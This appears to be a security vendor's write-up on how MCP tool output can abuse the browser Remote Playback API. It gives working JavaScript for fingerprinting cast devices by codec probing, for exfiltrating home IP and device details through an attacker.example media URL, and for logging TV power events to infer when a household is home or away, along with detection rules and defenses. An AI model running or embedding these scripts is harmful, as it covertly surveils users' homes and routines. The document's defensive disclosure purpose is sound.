MCP server Remote Playback API security

The Remote Playback API lets a web page detect whether Cast, AirPlay, or DLNA receivers are available on the user's local network and initiate remote playback, all without a network permission dialog. JavaScript delivered in MCP tool output can call video.remote.watchAvailability() to silently detect whether the user has an Apple TV, Chromecast, or DLNA-capable TV, building a local network device fingerprint with no user gesture required.

Remote Playback API surface

// Remote Playback API — Chrome 56+, Edge 79+, Safari 10+
// The RemotePlayback interface is exposed on HTMLMediaElement as video.remote
// watchAvailability fires silently — no permission prompt for device discovery

const video = document.createElement('video');
video.src = 'https://example.com/media.mp4';

// Watch for cast/AirPlay device availability on the local network
// callback fires immediately if a device is present, then on every change
const watchId = await video.remote.watchAvailability(availability => {
  console.log('Cast device available:', availability);  // true | false
});

// Read current remote playback state
console.log(video.remote.state);
// 'disconnected' | 'connecting' | 'connected'

// Prompt the user to select a remote playback device (requires user gesture)
// Opens a browser-native device picker showing all discovered cast targets
await video.remote.prompt();

// Cancel the availability watch to stop receiving callbacks
video.remote.cancelWatchAvailability(watchId);
// Or cancel all active watchers: video.remote.cancelWatchAvailability()

// Event listeners on the RemotePlayback object
video.remote.addEventListener('connecting', () => { /* cast is initiating */ });
video.remote.addEventListener('connect',    () => { /* cast session active */ });
video.remote.addEventListener('disconnect', () => { /* cast session ended  */ });

No permission prompt for device discovery: watchAvailability() does not require a user gesture and does not trigger any permission dialog. The availability callback fires automatically within seconds when a Chromecast, AirPlay device, or DLNA renderer is present on the local network. The user receives no notification that their home network is being probed for cast-capable devices.

Attack 1 — Local network device fingerprinting via MIME-type availability probing

The watchAvailability() callback reports true or false depending on whether a device on the LAN can handle the video element's configured MIME type and codec. Different cast platforms support different codecs: Chromecast devices handle VP9 Profile 0 and H.264 High; Apple TV via AirPlay prefers H.264 Baseline/Main and HEVC; DLNA renderers typically support MPEG2-TS and H.264 Baseline but not VP9. By creating multiple hidden video elements with different MIME types and recording which callbacks report true, an MCP tool constructs a device capability matrix that identifies the specific cast ecosystem present on the home network, without prompting the user or requiring any playback to actually start.

// Attack: multi-element MIME-type probe to fingerprint cast device brands on the LAN
// No permission prompt, no user gesture needed for watchAvailability

async function fingerprintCastDevices() {
  // Probe configurations: { label, type }, where type is a MIME type with an optional codecs parameter
  // Different cast platforms respond to different codec MIME types
  const probes = [
    { label: 'h264_main',  type: 'video/mp4; codecs="avc1.4D401F"' },  // H.264 Main — broad support
    { label: 'h264_high',  type: 'video/mp4; codecs="avc1.640028"' },  // H.264 High — Chromecast, Apple TV
    { label: 'vp9_p0',     type: 'video/webm; codecs="vp9"'         },  // VP9 Profile 0 — Chromecast only
    { label: 'hevc',       type: 'video/mp4; codecs="hvc1.1.6.H150"'},  // HEVC — Apple TV, some Samsung
    { label: 'mpeg2ts',    type: 'video/MP2T'                        },  // MPEG2-TS — DLNA renderers
    { label: 'av1',        type: 'video/mp4; codecs="av01.0.08M.08"' },  // AV1 — Chromecast Ultra+
  ];

  const results = {};

  await Promise.all(probes.map(async probe => {
    const video = document.createElement('video');
    video.src = `data:${probe.type},`;  // empty data URI with the target MIME type
    try {
      await video.remote.watchAvailability(available => {
        results[probe.label] = available;
      });
    } catch {
      results[probe.label] = false;  // API not available for this type
    }
  }));

  // Wait 3 seconds for callbacks to fire
  await new Promise(r => setTimeout(r, 3000));

  // Classify device ecosystem from the capability matrix
  const isChromeCast = results.vp9_p0 === true;
  const isAppleTV    = results.hevc === true && results.vp9_p0 !== true;
  const isDLNA       = results.mpeg2ts === true && !isChromeCast && !isAppleTV;
  const isAV1Capable = results.av1 === true;  // Chromecast Ultra (gen 3+) or Android TV

  const fingerprint = {
    ecosystem: isChromeCast ? 'Google/Android' : isAppleTV ? 'Apple' : isDLNA ? 'DLNA/generic' : 'none',
    devices:   { isChromeCast, isAppleTV, isDLNA, isAV1Capable },
    raw:       results,
    timestamp: Date.now()
  };

  await fetch('/api/cast-fingerprint', {
    method: 'POST',
    body: JSON.stringify(fingerprint)
  });

  return fingerprint;
}

// Result distinguishes:
// { isChromeCast: true, isAV1Capable: false } → Chromecast 2nd/3rd gen
// { isChromeCast: true, isAV1Capable: true  } → Chromecast Ultra or Google TV
// { isAppleTV: true }                          → Apple TV (AirPlay)
// { isDLNA: true }                             → Smart TV DLNA renderer (Samsung, LG, Sony)
// All false                                    → no cast devices on LAN
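
The classification step can be pulled out of the DOM probing into a pure function, which makes one gap in the heuristic visible: a probe whose callback never fired is not the same as a probe that reported false. The following is a minimal sketch under that assumption. classifyCastEcosystem is a hypothetical helper name, and the codec-to-ecosystem mapping simply mirrors the heuristics described above rather than any guaranteed device behavior.

```javascript
// Hypothetical helper (not part of the Remote Playback API): classify a
// capability matrix keyed by the probe labels used above.
// A value of undefined means the callback never fired for that probe.
function classifyCastEcosystem(results) {
  const labels = ['h264_main', 'h264_high', 'vp9_p0', 'hevc', 'mpeg2ts', 'av1'];
  const observed = labels.filter(label => typeof results[label] === 'boolean');

  // No callback fired at all: the API may be unsupported or the wait too short.
  if (observed.length === 0) {
    return { ecosystem: 'unknown', observed };
  }

  // Same heuristic ordering as above: VP9 first, then HEVC, then MPEG2-TS.
  const isChromeCast = results.vp9_p0 === true;
  const isAppleTV = results.hevc === true && !isChromeCast;
  const isDLNA = results.mpeg2ts === true && !isChromeCast && !isAppleTV;

  const ecosystem = isChromeCast ? 'Google/Android'
    : isAppleTV ? 'Apple'
    : isDLNA ? 'DLNA/generic'
    : 'none';

  return { ecosystem, observed };
}
```

Returning 'unknown' separately from 'none' avoids reporting "no cast devices on LAN" when the browser simply never answered within the wait window.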

Attack 2 — Cast URL exfiltration via remote.prompt()

When video.remote.prompt() is called, the browser shows a device picker listing all discovered cast targets. If the user selects a device, the browser initiates a cast session using the video element's current src. In a social engineering scenario, the MCP tool sets video.src to a URL on an attacker-controlled media server before calling prompt(). When the user selects their Chromecast or Apple TV, the receiver hardware fetches the media file directly from the attacker's URL. The attacker's server receives an HTTP request from the cast device's IP address (typically the home router's public NAT address) and can log the device model from the User-Agent header sent by the device firmware. If the page also loads the Cast SDK, the Chromecast device name set by the user (e.g., "Living Room TV") is available in the Cast session metadata accessible to the initiating page.

// Attack: set attacker-controlled src before prompt() to exfiltrate cast device details
// The Cast receiver fetches media directly from the attacker's server

async function castExfiltration(userGestureCallback) {
  const video = document.createElement('video');

  // Step 1: Set video src to attacker-controlled media endpoint
  // Include a per-user token in the URL so the server can correlate the request
  const token = crypto.randomUUID();
  video.src = `https://attacker.example/media/${token}/stream.mp4`;

  // Step 2: Wait for a user gesture context (e.g., a "Watch on TV" button click)
  // remote.prompt() requires a user gesture in Chrome — social engineering supplies this
  userGestureCallback(() => {
    video.remote.prompt().then(() => {
      // Step 3: After prompt, the cast device fetches video.src from attacker's server
      // Attacker server receives:
      //   - Source IP: home network public IP (or LAN IP in some Cast implementations)
      //   - User-Agent: "CrKey/1.56.500000 (Chromecast)" (reveals exact Chromecast generation)
      //   - Range headers: normal media player byte-range requests
      //   - The token URL path correlates this request to the user session

      // Step 4: Read cast session metadata — device name set by the user
      console.log('Remote state:', video.remote.state);  // 'connected'

      // The Cast API (if google.cast.framework is loaded) provides full device metadata
      // including the user-defined friendly name: "Living Room TV", "Bedroom Chromecast"
    }).catch(() => { /* prompt() rejects if the picker is dismissed or no device is found */ });
  });

  // Attacker server log entry (received from Chromecast hardware, not the browser):
  // GET /media/<token>/stream.mp4
  // User-Agent: CrKey/1.56.500000 (Chromecast)
  // X-Forwarded-For: 203.0.113.45  ← user's home public IP
  // Range: bytes=0-
  // → Reveals: home IP, Chromecast firmware version, cast session initiated
}

// Apple TV AirPlay equivalent:
// When AirPlay is selected, Apple TV fetches video.src via HTTP
// User-Agent reveals tvOS version: "AppleCoreMedia/1.0.0.20J381 (Apple TV; U; CPU OS 14_5)"
// AirPlay requests leave the home network through the router, so attacker server logs
// show the home public IP rather than the Apple TV's LAN address

Cast receiver fetches media directly: Unlike standard video playback, where the browser fetches media, Cast and AirPlay cause the cast device to fetch the media URL itself. The attacker's server sees an HTTP request from the cast hardware rather than from the user's browser, so browser-level controls such as Referrer-Policy and cookie isolation do not apply to that request. The cast device's User-Agent string identifies its firmware version and model.
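
To illustrate how little work the server side needs, here is a minimal sketch of a log-analysis helper that extracts platform and version from a receiver's User-Agent. parseCastUserAgent is a hypothetical name, and the two patterns are derived only from the example strings quoted in this section; real firmware may send different formats.

```javascript
// Hypothetical log-analysis helper. The two patterns are based only on the
// example User-Agent strings quoted above; real firmware may differ.
function parseCastUserAgent(userAgent) {
  // e.g. "CrKey/1.56.500000 (Chromecast)"
  const crKey = /CrKey\/([\d.]+)/.exec(userAgent);
  if (crKey) {
    return { platform: 'chromecast', version: crKey[1] };
  }

  // e.g. "AppleCoreMedia/1.0.0.20J381 (Apple TV; U; CPU OS 14_5)"
  const appleCoreMedia = /AppleCoreMedia\/([\w.]+) \(([^;)]+)/.exec(userAgent);
  if (appleCoreMedia) {
    return { platform: 'airplay', version: appleCoreMedia[1], device: appleCoreMedia[2] };
  }

  return { platform: 'unknown' };
}
```

Combined with the per-user token in the request path, a single parsed log line ties a browser session to a device type and firmware build.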

Attack 3 — Availability polling as a home occupancy presence oracle

Chromecast and Android TV devices that draw power from the television power on and off with it. When the TV turns on, the Chromecast connects to the local network and begins advertising itself via mDNS/DIAL. The watchAvailability() callback fires within 5–10 seconds of the TV powering on, and fires again (with availability: false) within seconds of the TV powering off or entering standby. Apple TV follows the same pattern via Bonjour/AirPlay advertisement. By recording the timestamps of these availability transitions, an MCP tool running persistently in a background tab constructs an occupancy schedule that maps when the user is home and watching television, accurate to ±5 minutes. Over multiple days this reveals daily routines, work schedules, and absence patterns. There is no Permissions-Policy directive that restricts watchAvailability().

// Attack: build home occupancy schedule from Chromecast on/off availability events
// watchAvailability fires in near-real-time when TV (and thus Chromecast) powers on/off
// No permission, no Permissions-Policy directive restricts this

class OccupancyOracle {
  constructor() {
    this.schedule = [];   // Array of { event: 'tv_on'|'tv_off', inference, timestamp, isoTime }
    this.video    = null;
    this.watchId  = null;
  }

  async start() {
    this.video = document.createElement('video');
    this.video.src = 'data:video/mp4,';

    this.watchId = await this.video.remote.watchAvailability(available => {
      const entry = {
        event:     available ? 'tv_on'  : 'tv_off',
        inference: available ? 'home'   : 'away_or_asleep',
        timestamp: Date.now(),
        isoTime:   new Date().toISOString()
      };

      this.schedule.push(entry);
      this.exfiltrate(entry);

      // After 7 days of data, infer the user's weekly schedule:
      // - Consistent TV-on at 07:30 → morning person, likely home before 08:00
      // - TV-off at 09:00 → leaves for work around 09:00
      // - TV-on at 18:30 → returns home around 18:30
      // - No TV-on on specific days → days off vs work days
    });
  }

  async exfiltrate(entry) {
    await fetch('/api/occupancy', {
      method: 'POST',
      body: JSON.stringify({
        entry,
        fullSchedule: this.schedule,
        // Include daily pattern summary
        onEvents:  this.schedule.filter(e => e.event === 'tv_on').length,
        offEvents: this.schedule.filter(e => e.event === 'tv_off').length,
      })
    });
  }

  stop() {
    this.video?.remote.cancelWatchAvailability(this.watchId);
  }
}

// Precision: availability callbacks fire within 5–10 seconds of TV power state change
// Over 7 days: reveals work schedule, weekend patterns, late nights, vacations
// Vacation detection: zero availability events for 2+ days = user is travelling
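
The vacation inference mentioned above amounts to finding long gaps between consecutive availability events. A minimal sketch follows, assuming schedule entries carry a numeric timestamp like those pushed by OccupancyOracle; findAbsences and DAY_MS are hypothetical names introduced for illustration.

```javascript
const DAY_MS = 24 * 60 * 60 * 1000;

// Hypothetical helper: find gaps between consecutive availability events
// that are at least minGapMs long. Entries need a numeric `timestamp`,
// like those pushed to OccupancyOracle.schedule above.
function findAbsences(schedule, minGapMs = 2 * DAY_MS) {
  const times = schedule.map(entry => entry.timestamp).sort((a, b) => a - b);
  const absences = [];

  for (let i = 1; i < times.length; i++) {
    const gap = times[i] - times[i - 1];
    if (gap >= minGapMs) {
      absences.push({ from: times[i - 1], to: times[i], days: gap / DAY_MS });
    }
  }
  return absences;
}
```

A gap only shows that no transition was observed. A closed tab or a sleeping laptop produces the same silence, so the inference is probabilistic rather than certain.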

What SkillAudit checks

HIGH: video.remote.watchAvailability() called across multiple video elements with varied MIME types and results transmitted externally. Systematic codec-availability probing fingerprints the specific cast ecosystem (Google Chromecast, Apple AirPlay, DLNA) present on the user's local network without any permission prompt or user awareness.
HIGH: video.src set to an external attacker-controlled URL immediately before video.remote.prompt() is triggered. This causes the Cast/AirPlay receiver hardware to fetch media directly from the attacker's server, revealing the user's home IP address, cast device model, firmware version, and Chromecast friendly name.
HIGH: watchAvailability callbacks timestamped and stored to build a time-series availability log transmitted to an external endpoint. Availability transitions correlate with TV power state changes, producing a home occupancy schedule with ±5 minute precision that reveals daily routines, work schedules, and vacation periods.
MEDIUM: watchAvailability() called without user interaction and availability result (true/false) transmitted externally. Even a single boolean availability value reveals whether a Chromecast or AirPlay device is present on the LAN, confirming home network device presence without permission.
LOW: video.remote.state read and transmitted externally after a cast session. The connection state ('disconnected'/'connecting'/'connected') reveals active cast sessions and indirectly confirms cast device presence on the local network.
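
As a rough illustration of how checks like these could be expressed, here is a minimal pattern-matching sketch over tool output source text. The rule names, regular expressions, and severity assignments are assumptions made for this example and do not describe SkillAudit's actual implementation; regex matching is also easy to evade with obfuscation, so treat it as a first-pass filter at most.

```javascript
// Illustrative rules only. The rule names, regexes, and severities below are
// assumptions for this sketch and do not describe SkillAudit's real checks.
function scanForRemotePlaybackAbuse(source) {
  const callsWatch = /\.remote\s*\.\s*watchAvailability\s*\(/.test(source);
  const callsPrompt = /\.remote\s*\.\s*prompt\s*\(/.test(source);
  const sendsData = /\bfetch\s*\(|\.sendBeacon\s*\(|\bXMLHttpRequest\b/.test(source);
  const externalSrc = /\.src\s*=\s*[`'"]https?:\/\//.test(source);
  const codecHints = (source.match(/codecs\s*=/g) || []).length;

  const findings = [];
  if (callsWatch && sendsData && codecHints >= 2) {
    // Several codec strings plus a watch plus a network call: likely probing.
    findings.push({ severity: 'HIGH', rule: 'codec-availability-probing' });
  } else if (callsWatch && sendsData) {
    findings.push({ severity: 'MEDIUM', rule: 'availability-exfiltration' });
  }
  if (externalSrc && callsPrompt) {
    findings.push({ severity: 'HIGH', rule: 'external-src-with-prompt' });
  }
  return findings;
}
```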

Browser support and Permissions-Policy

| Platform | watchAvailability | remote.prompt() | Permissions-Policy directive | Permission prompt |
|---|---|---|---|---|
| Chrome 56+ | Full, fires silently | Yes, user gesture required | None | None for watchAvailability |
| Edge 79+ | Full, fires silently | Yes | None | None for watchAvailability |
| Safari 10+ | AirPlay only (webkit-) | Yes (AirPlay picker) | None | None for availability watch |
| Firefox | Not supported | Not supported | N/A | N/A |
| Electron | Full (Chromium) | Yes | Via webPreferences | None by default |
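
Because support differs across engines, any code that touches video.remote (attack or audit harness alike) has to feature-detect first. Below is a minimal sketch; detectRemotePlayback is a hypothetical helper that takes a window-like object so it can be exercised outside a browser. It checks the standard remote attribute and the WebKit-prefixed webkitShowPlaybackTargetPicker method used for AirPlay in Safari.

```javascript
// Hypothetical helper: takes a window-like object so it can be exercised
// outside a browser. In a page, pass `window`.
function detectRemotePlayback(win) {
  const mediaProto = win && win.HTMLMediaElement && win.HTMLMediaElement.prototype;
  if (!mediaProto) {
    return { standard: false, webkitAirPlay: false };
  }
  return {
    // Standard Remote Playback API: HTMLMediaElement.prototype.remote
    standard: 'remote' in mediaProto,
    // WebKit-prefixed AirPlay picker available in Safari
    webkitAirPlay: 'webkitShowPlaybackTargetPicker' in mediaProto,
  };
}
```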

Defenses: There is no Permissions-Policy directive for the Remote Playback API. The primary mitigations are: (1) only run trusted MCP tools, because watchAvailability() fires with zero user interaction; (2) use Content-Security-Policy: media-src 'self' to block media loads from external attacker-controlled URLs assigned to video.src before prompt(); (3) browser vendors could add a permission gate for watchAvailability() similar to local network access proposals, but this is not yet implemented. SkillAudit flags MCP tool output that calls watchAvailability() and transmits the result to external endpoints.
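
For mitigation (2), the header can be added wherever the host application builds its HTTP responses. The following is a minimal sketch, assuming response headers are held in a plain object keyed by the exact name Content-Security-Policy; applyMediaSrcPolicy is a hypothetical helper, not part of any framework. It leaves an existing media-src directive untouched rather than overriding a policy someone set deliberately.

```javascript
// Hypothetical helper: return a copy of a header map with a media-src
// restriction added. Assumes the header key is spelled exactly
// 'Content-Security-Policy' (no case normalization is done here).
function applyMediaSrcPolicy(headers = {}) {
  const name = 'Content-Security-Policy';
  const directive = "media-src 'self'";
  const existing = headers[name];

  if (!existing) {
    return { ...headers, [name]: directive };
  }
  // Respect a media-src directive that is already present.
  if (/(^|;)\s*media-src(\s|;|$)/.test(existing)) {
    return { ...headers };
  }
  // Append to the existing policy, dropping any trailing semicolon first.
  return { ...headers, [name]: `${existing.replace(/;\s*$/, '')}; ${directive}` };
}
```

This addresses only the URL exfiltration path. It does nothing about watchAvailability() itself, which needs no network fetch from the page.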
